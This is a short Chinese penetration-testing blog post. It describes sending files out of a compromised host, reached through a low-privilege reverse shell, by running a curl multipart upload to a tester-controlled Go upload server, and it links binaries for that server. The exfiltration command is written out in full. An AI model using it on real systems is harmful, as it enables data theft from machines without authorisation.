渗透测试|利用curl回传文件

TRY 4,470 0

至少我们曾经在一起过。

来自:一言

说明

现在有一种情况,反弹了一个低权限的shell[aru_17],然后该网站又没有web服务,然后用scp命令也是权限不够(需要验证密码),通过网上查询方法说使用 sshpass 可以进行带密码执行scp命令,但是需要安装这个命令,当前权限并不能安装该命令[aru_28],所以在大表哥的提示下,可以采用curl命令进行文件回传的操作。[aru_21]

条件

1.一台服务器(这个肯定要的[aru_13])

2.目标服务器能够执行curl命令。

方法

1.采用golang编写一个简单的获取文件上传的后端(用golang的话可以避免安装环境等操作,当然你也可以用别的语言来搞一个[aru_62])

点击查看后端源码

2.curl命令参数(根据环境更改)

curl -F "file=@文件路径" http://localhost:8088/upload
##上传成功会回显ok

渗透测试|利用curl回传文件

下载

上方提供了源码,如果懒得编译的可以直接下载。编译了windows和linux下64位的运行程序。

蓝奏云

发表评论 取消回复
表情 图片 链接 代码

分享